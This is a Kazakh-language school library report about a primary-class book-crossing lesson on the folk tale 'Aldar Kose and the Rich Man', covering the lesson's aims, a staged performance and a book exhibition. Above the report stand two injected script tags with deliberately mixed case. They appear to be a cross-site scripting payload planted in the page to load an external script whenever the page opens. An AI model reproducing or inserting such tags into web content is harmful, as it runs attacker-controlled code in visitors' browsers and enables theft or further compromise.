<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
13.02.2018
Мектебімізде бастауыш сыныптар арасында «Кітап – білім бұлағы» жобасы буккросинг бойынша «Алдар көсе мен бай» тақырыбында жаппай оқу әдісін қолдана отырып, кітап көрмесі мен кітапхана сабағын бастауыш сынып мұғалімі Жуманова С.Е мен бірге ұйымдастырдым.
Сабақтың мақсаты: Көркем шығарманың мазмұнын зейін қойып тыңдауға үйренеді. Ертегі тыңдау қабілеттері қалыптасады, байланыстырып сөйлейді, есте сақтау, ойлау қабілеттері дамиды. Қайырымдылыққа, адамгершілік қасиеттерге тәрбиелейді.
Оқушыларға интерактивті тақта арқылы «Алдар көсе» деген кім? - екенін түсіндіре отырып, «Алдар көсе мен бай» ертегісін әңгімеленді. Бастауыш сынып мұғалімі Жуманова С.Е-қызы оқушылары «Алдар көсе мен бай» ертегісін көрініс түрінде көрсетті. Бұл ертегіде не түсінгендері жөнінде сұрап, оқушыларды қызықты әңгімеге тарттық. Оқушылар өз түсінгендерін жарыса баяндады. Сабақ соңынан «Алдар көсе» жайлы мультфильмнен үзінді көрсетілді. Сонымен қатар кітап көрмесі қойылды. Алдар көсе жайлы кітаптар мен ертегі кітаптарды қойып насихатталдым. Өскелең ұрпақ кітап оқуға деген қызығушылықтарын арттыру мақсатында «Кітап - білім бұлағы» жобасын жүзеге асыруды қолға алдық.